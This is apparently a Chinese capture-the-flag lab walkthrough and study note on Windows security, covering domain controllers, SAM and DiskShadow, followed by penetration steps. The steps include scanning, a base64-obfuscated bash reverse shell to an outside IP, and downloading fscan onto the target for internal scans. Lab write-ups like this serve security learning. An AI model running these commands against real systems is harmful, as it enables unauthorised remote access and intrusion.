https://yunjing.ichunqiu.com/major/detail/1113?type=1
学习:https://xz.aliyun.com/news/13525
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
windows安全基础知识小记
之前对系统安全了解比较少,现在从靶场开始了解一下吧。可能这样了解并不会让我很快速并且全面的了解到系统安全的表面。表面是指哪些容易出问题的地方以及如何简单的利用。原理更是不太好理解到。
PS1文件
powershell脚本
https://zhuanlan.zhihu.com/p/693205061
https://www.freebuf.com/sectool/171697.html
域控制器
Domain controller,简称DC是指在计算机网络域内响应安全身份认证请求的网络服务器,负责允许发出请求的主机访问域内资源,以及对用户进行身份验证,存储用户账户信息,并执行域的安全策略。
域控制器中包含了这个域的用户账户、密码和属于这个域的电脑等信息构成的数据库。当电脑连入网络时,域控制器首先要鉴别这台电脑是否是属于这个域,用户使用的登录账号是否存在、密码是否正确。如果以上信息不正确,域控制器就拒绝该用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,只能以对等网用户的方式访问Windows共享的资源,这样就一定程度上保护了网络上的资源。
其实域和工作组在结构上很相似,只是表现形式有些不同:
1、工作组:只能将数量不多的电脑连成一个可互相共享资源的网络,在这种工作方式下,信息的安全保护只能靠给共享信息设置密码或将使用权限设置给特殊用户来实现。
2、域:采用域控制器来进行信息管理,每个用户都有自己的账号和密码,并且可根据不同的情况赋予不同的使用权限,这种方式不但使网络信息安全得到了非常好的保障,同时也满足了大中型网络的要求。
SAM
Security Account Manager安全账号管理器
https://www.windows-active-directory.com/windows-security-account-manager.html
Windows 将本地用户和组账户存储并管理在一个名为安全账户管理器(SAM)的数据库文件中。它对本地用户登录进行身份验证。在域控制器上,仅存储其作为服务器时的管理员账户,该账户作为目录服务恢复模式(DSRM)的恢复账户。SAM 数据库位于 Windows 注册表中。
DiskShadow
https://learn.microsoft.com/zh-cn/windows-server/storage/file-server/volume-shadow-copy-service
https://learn.microsoft.com/zh-cn/windows-server/administration/windows-commands/diskshadow
flag01
1 | fscan -h 39.98.122.145 -nobr -np |
1 | python dirsearch.py -u http://39.98.122.145:8080/ |
1 | java -jar heapdump.jar "heapdump" > 1.txt |
1 | / >find / -name flag* |
flag02
反弹shell
netcat -lvvp 7001
1 | bash -c '{echo,YmFzaCAtaSAmPiAvZGV2L3RjcC84MS43MC4zMi4xMTYvNzAwMSAwPiYx}|{base64,-d}|{bash,-i}' |
ifconfig
发现
1 | python3 -m http.server 80 |
远程下载fscan
1 | curl http://81.70.32.116:80/fscan --output fscan |
扫一下
1 | ./fscan -h 172.22.17.213/24 |
1 | python3 -m http.server 7002 |
1 | http://172.22.17.6/ |
拿到
1 | WIN-SCADA: 172.22.26.xx |
同时得到
1 | 1. 登陆权限限制: |
成功连接
目标环境不出网且为普通用户
flag03
根据可以猜测为双网卡
fscan扫一下
flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}